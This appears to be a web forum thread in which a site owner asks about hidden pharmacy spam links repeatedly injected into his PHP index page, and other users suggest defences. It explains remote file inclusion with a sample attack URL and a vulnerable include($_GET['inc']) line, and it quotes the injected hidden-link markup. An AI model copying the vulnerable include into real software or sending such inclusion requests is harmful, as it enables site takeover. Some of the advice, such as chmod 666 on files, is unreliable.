Site is hacked, custom PHP programming

Hello!
what a great world the internet is..
my site got hacked several times, although the site was just a free site, didn't collect any user informations, just posting some valuable information..hmm but the site is frequently got hacked..

I would like to ask for a help, i would like to know, what kind of hacking that posting so manny active hidden link on an index.php page?

i've implementing :

• validating $_GET[]
• disabling global variables
• disabling OS command

but i did log on to cpanel and found that my site is hacked again..

anyone having similar experience arround this matter? how did you all solve those kind of problems?

Thank you very much before
Regards,
Yohan..

ps. The site is on the sig link

 

Probably easy passwords, usually the fastest way to hack, try changing them, else swap the script you're running on.

 

Or the whole server got compromised and you are being a victim of a hack through another account.

 

Eh, your site might have a rfi vulnerability, or if it has a db, the hacker might have sql injected it and got the admin pass.

 

Wow, havent though about sql injection, i'm adding some security measurement now, let see if it got hacked again..

it's quite entertaining to see the work of the hacker, he/she is just adding some "<a hrefs>" and they are without any anchor text.. ex: <a href="http://somesite.blabla.com></a> things.. didn't do any 'defacing' or anything else, i wonder.. what kind of hacking is this..

Anyway.. i do salute the hacker

 

That's some strange hacking xD
But here is a tutorial about SQL injections: http://www.tizag.com/mysqlTutorial/mysql-php-sql-injection.php
All you have to do is use the mysql_real_escape_string function. (for php4 mysql_escape_string)

 

Cheap backlink method, it's probably a mass deface script, you can check this if every index.php/html file has these lines of code.

 

Ah, script kiddies everywhere. btw yohanip, watch out for rfi loopholes too, they can be dangerous. Anybody could upload a shell and own the whole thing if have a rfi vulnerability on your site.

 

Thank you very much! btw, what is an RFI Vulneralibility?

 

RFI means Remote File Inclusion. It is an attempt to trick your server into reading a file from a remote server (not yours), including its text into your PHP script, and getting it to execute as though it's part of your script.

When you see an entry in your logs that looks like this:

http:/yoursite/page.php?inc=http:/othersite/safe.txt?

it is an RFI attack. If your script has a variable called inc and register_globals is on, and allow_url_fopen is on, then your server will get the safe.txt file (usually a PHP hacking script), execute it as part of your web page, and the site will be instantly hacked.

 

I'm assuming that the vulneralibility was on apache handlers then?

Ow news-flash by the time i typed this, i try visit the website again and it was all hacked up again, and he/she still hiding the anchor text of the links.. here is a code snippet : (the hacker is appending this code to the my original "index.php" script)

<div id="wp_internal" style="position:absolute;left:-6012px;top:0px;">
<ul><li><a href="http://job era. com/ 2007/05/ 16/levitra- lady/">levitra lady</a></li>
<li>........ [b]there maybe hundreds of em[/b]
</ul></div>

<font style='position: absolute;overflow: hidden;height: 0;width: 0'><ul><li><a href="http:// mensleade rshipforum chicago. org/2007/04/04/hydrocodone-and-pharmacy/">hydrocodone and pharmacy</a></li> ...............[b]arround 100times[/b]</ul></font>

Code (markup):

Thanks!

 

It is possible that hacker have uploaded some bad script on your server & he can access you site via that file even after you fixed the vulnerability.It might be a php shell or something like that.Check your php logs & if you are on shared hosting ask your provider to help you.Try to find out the method which is hacker using to edit your index file either he is doing it via ftp or php.Double check your file permissions and don't give writing or executing permissions to public group.Better to do chmod "666" on files and "755" on folders.Hackers usally upload php shell after hacking a site via rfi.It might be sql injection too for that use some good encrytion for your password & use strong password, better to check your script for sql vulnerabilities & other vulnerabilities.

I hope it will help you.You can ask me more about it.

 

Thank you
i'm contacting the hosting company right away..
i wonder.. are there any way to change PHP ini file through cPanel on a shared hosting.. anyone please?

 

The actual vulnerability is usually in an application like WordPress or forum or shopping cart software, etc., or in a user-built PHP script.

If any of those are out of date, they're suspects.

Here's a simple case of vulnerable PHP code:

include($_GET['inc']);

Presumably the author wants to specify which page to include via the URL, but it's vulnerable because a hacker can substitute any URL, such as in the example in the previous post.

Although the vulnerability is in a script somewhere, there's more than one way to guard against RFI. It's not a bad idea to use all of them. Attacks can be blocked by a) fixing the script, b) in php.ini by turning off register_globals and allow_url_fopen, c) in .htaccess by turning off register_globals. Unfortunately, you can't disable allow_url_fopen in .htaccess.

You can also use .htaccess to block all requests where the query string contains "http" or "ftp".

 

It depends on where your php.ini is located, and that depends on the host, so ask them. If you are allowed to have your own php.ini, then it will be (or you can create it) in public_html, and you can edit it from cPanel > File Manager. It's a plain text file.

 

Thank you very much, you are indeed a guru

 

you are having your own server???
install firewall then install AV..more then 60% attacks are blocked by antivirus.then install chkroot hunter and other security measurements.and also you must install ELs script for your server.
change the ip of ssh server.change the ssh port.and also on top of that disable ssh for all your clients and sites.and make sure that you have scanned your whole server for rootkit.and then manually scan your all clients.

 

This is deep unfortunately i'm still using a shared hosting solutions, anyway i'm trying to create a php.ini file on the public_html root, but.. is it safe to do that? if it's a public_html.. woulnd't it be visible to every visitor?..
aww.. the headache of security programing..

 

yes u r right..try to save that file in home dir other then publlic_html

 

Didn't he already told that he is using shared hosting?

Nice tips anyway.